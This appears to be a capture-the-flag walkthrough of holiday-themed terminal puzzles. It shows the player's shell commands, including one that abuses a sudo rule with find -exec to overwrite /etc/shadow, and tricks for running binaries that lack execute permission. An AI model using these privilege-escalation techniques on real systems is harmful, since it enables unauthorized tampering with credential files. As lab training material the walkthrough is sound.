         /@\_\_\@\_\_\
        /_/_/O/_/_/_/_\
       /_\_\_\_\_\o\_\_\
      /_/0/_/_/_0_/_/@/_\
     /_\_\_\_\_\_\_\_\_\_\
    /_/o/_/_/@/_/_/o/_/0/_\
   jgs       [___]  
My name is Shinny Upatree, and I've made a big mistake.
I fear it's worse than the time I served everyone bad hake.
I've deleted an important file, which suppressed my server access.
I can offer you a gift, if you can fix my ill-fated redress.
Restore /etc/shadow with the contents of /etc/shadow.bak, then run "inspect_da_box" to complete this challenge.
Hint: What commands can you run with sudo?
elf@5ded5c157d02:~$ /usr/bin/sudo -g shadow /usr/bin/find /etc -name shadow.bak -exec cp {} /etc/shadow \;
elf@5ded5c157d02:~$ /usr/local/bin/inspect_da_box
                     ___
                    / __'.     .-"""-.
              .-""-| |  '.'.  / .---. \
             / .--. \ \___\ \/ /____| |
            / /    \ `-.-;-(`_)_____.-'._
           ; ;      `.-" "-:_,(o:==..`-. '.         .-"-,
           | |      /       \ /      `\ `. \       / .-. \
           \ \     |         Y    __...\  \ \     / /   \/
     /\     | |    | .--""--.| .-'      \  '.`---' /
     \ \   / /     |`        \'   _...--.;   '---'`
      \ '-' / jgs  /_..---.._ \ .'\\_     `.
       `--'`      .'    (_)  `'/   (_)     /
                  `._       _.'|         .'
                     ```````    '-...--'`
/etc/shadow has been successfully restored!

Pepper Minstix

                             ______
                          .-"""".._'.       _,##
                   _..__ |.-"""-.|  |   _,##'`-._
                  (_____)||_____||  |_,##'`-._,##'`
                  _|   |.;-""-.  |  |#'`-._,##'`
               _.;_ `--' `\    \ |.'`\._,##'`
              /.-.\ `\     |.-";.`_, |##'`
              |\__/   | _..;__  |'-' /
              '.____.'_.-`)\--' /'-'`
               //||\\(_.-'_,'-'`
             (`-...-')_,##'`
      jgs _,##`-..,-;##`
       _,##'`-._,##'`
    _,##'`-._,##'`
      `-._,##'`
My name is Pepper Minstix, and I need your help with my plight.
I've crashed the Christmas toy train, for which I am quite contrite.
I should not have interfered, hacking it was foolish in hindsight.
If you can get it running again, I will reward you with a gift of delight.
total 444
-rwxr-xr-x 1 root root 454636 Dec  7 18:43 trainstartup
elf@d04e67d2f54c:~$ qemu-arm trainstartup



    Merry Christmas
    Merry Christmas
v
>*<
^
/o\
/   \               @.·
/~~   \                .
/ ° ~~  \         · .    
/      ~~ \       ◆  ·    
/     °   ~~\    ·     0
/~~           \   .─··─ · o
             /°  ~~  .*· · . \  ├──┼──┤                                        
              │  ──┬─°─┬─°─°─°─ └──┴──┘                                        
≠==≠==≠==≠==──┼──=≠     ≠=≠==≠==≠==≠==≠==≠==≠==≠==≠==≠==≠==≠==≠==≠==≠==≠==≠===≠
              │   /└───┘\┌───┐       ┌┐                                        
                         └───┘    /▒▒▒▒                      ▒                 
≠==≠==≠==≠==≠==≠==≠==≠==≠==≠==≠==≠=°≠=°≠==≠==≠==≠==≠==≠==≠==≠=▒▒▒▒ ==≠==≠==≠==≠
You did it! Thank you!

Minty Candycane

                           ._    _.
                           (_)  (_)                  <> \  / <>
                            .\::/.                   \_\/  \/_/ 
           .:.          _.=._\\//_.=._                  \\//
      ..   \o/   ..      '=' //\\ '='             _<>_\_\<>/_/_<>_
      :o|   |   |o:         '/::\'                 <> / /<>\ \ <>
       ~ '. ' .' ~         (_)  (_)      _    _       _ //\\ _
           >O<             '      '     /_/  \_\     / /\  /\ \
       _ .' . '. _                        \\//       <> /  \ <>
      :o|   |   |o:                   /\_\\><//_/\
      ''   /o\   ''     '.|  |.'      \/ //><\\ \/
           ':'        . ~~\  /~~ .       _//\\_
jgs                   _\_._\/_._/_      \_\  /_/ 
                       / ' /\ ' \                   \o/
       o              ' __/  \__ '              _o/.:|:.\o_
  o    :    o         ' .'|  |'.                  .\:|:/.
    '.\'/.'                 .                 -=>>::>o<::<<=-
    :->@<-:                 :                   _ '/:|:\' _
    .'/.\'.           '.___/*\___.'              o\':|:'/o 
  o    :    o           \* \ / */                   /o\
       o                 >--X--<
                        /*_/ \_*\
                      .'   \*/   '.
                            :
                            '
Minty Candycane here, I need your help straight away.
We're having an argument about browser popularity stray.
Use the supplied log file from our server in the North Pole.
Identifying the least-popular browser is your noteworthy goal.
total 28704
-rw-r--r-- 1 root root 24191488 Dec  4 17:11 access.log
-rwxr-xr-x 1 root root  5197336 Dec 11 17:31 runtoanswer
elf@7b909dd6611c:~$ awk -F\" '{print $6}' access.log | sort | uniq -c | sort -fr
  27285 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.94 Safari/537.36
...
      1 Dillo/3.0.5
      1 curl/7.35.0

elf@7b909dd6611c:~$ ./runtoanswer 
Starting up, please wait......
Enter the name of the least popular browser in the web log: Dillo/3.0.5
That is the least common browser in the web log! Congratulations!

Holly Evergreen

                     ___
                    / __'.     .-"""-.
              .-""-| |  '.'.  / .---. \
             / .--. \ \___\ \/ /____| |
            / /    \ `-.-;-(`_)_____.-'._
           ; ;      `.-" "-:_,(o:==..`-. '.         .-"-,
           | |      /       \ /      `\ `. \       / .-. \
           \ \     |         Y    __...\  \ \     / /   \/
     /\     | |    | .--""--.| .-'      \  '.`---' /
     \ \   / /     |`        \'   _...--.;   '---'`
      \ '-' / jgs  /_..---.._ \ .'\\_     `.
       `--'`      .'    (_)  `'/   (_)     /
                  `._       _.'|         .'
                     ```````    '-...--'`
My name is Holly Evergreen, and I have a conundrum.
I broke the candy cane striper, and I'm near throwing a tantrum.
Assembly lines have stopped since the elves can't get their candy cane fix.
We hope you can start the striper once again, with your vast bag of tricks.
Run the CandyCaneStriper executable to complete this challenge.
elf@9d94c6300de0:~$
elf@9d94c6300de0:~$ /lib/x86_64-linux-gnu/ld-linux-x86-64.so.2 /home/elf/CandyCaneStriper 
                   _..._
                 .'\\ //`,      
                /\\.'``'.=",
               / \/     ;==|
              /\\/    .'\`,`
             / \/     `""`
            /\\/
           /\\/
          /\ /
         /\\/
        /`\/
        \\/
         `
The candy cane striping machine is up and running!
elf@9d94c6300de0:~$ 

Bushy Evergreen

                                 |
                               \ ' /
                             -- (*) --
                                >*<
                               >0<@<
                              >>>@<<*
                             >@>*<0<<<
                            >*>>@<<<@<<
                           >@>>0<<<*<<@<
                          >*>>0<<@<<<@<<<
                         >@>>*<<@<>*<<0<*<
           \*/          >0>>*<<@<>0><<*<@<<
       ___\\U//___     >*>>@><0<<*>>@><*<0<<
       |\\ | | \\|    >@>>0<*<0>>@<<0<<<*<@<<  
       | \\| | _(UU)_ >((*))_>0><*<0><@<<<0<*<
       |\ \| || / //||.*.*.*.|>>@<<*<<@>><0<<<
       |\\_|_|&&_// ||*.*.*.*|_\\db//_               
       """"|'.'.'.|~~|.*.*.*|     ____|_
           |'.'.'.|   ^^^^^^|____|>>>>>>|
           ~~~~~~~~         '""""`------'
My name is Bushy Evergreen, and I have a problem for you.
I think a server got owned, and I can only offer a clue.
We use the system for chat, to keep toy production running.
Can you help us recover from the server connection shunning?
Find and run the elftalkd binary to complete this challenge.
elf@9c19b504d83c:~$ 
elf@9c19b504d83c:~$ ls -d -1 /**/* | grep -i elftalk
/run/elftalk
elf@9c19b504d83c:~$ ls /run/elftalk/bin/elftalkd 
/run/elftalk/bin/elftalkd
elf@9c19b504d83c:~$ /run/elftalk/bin/elftalkd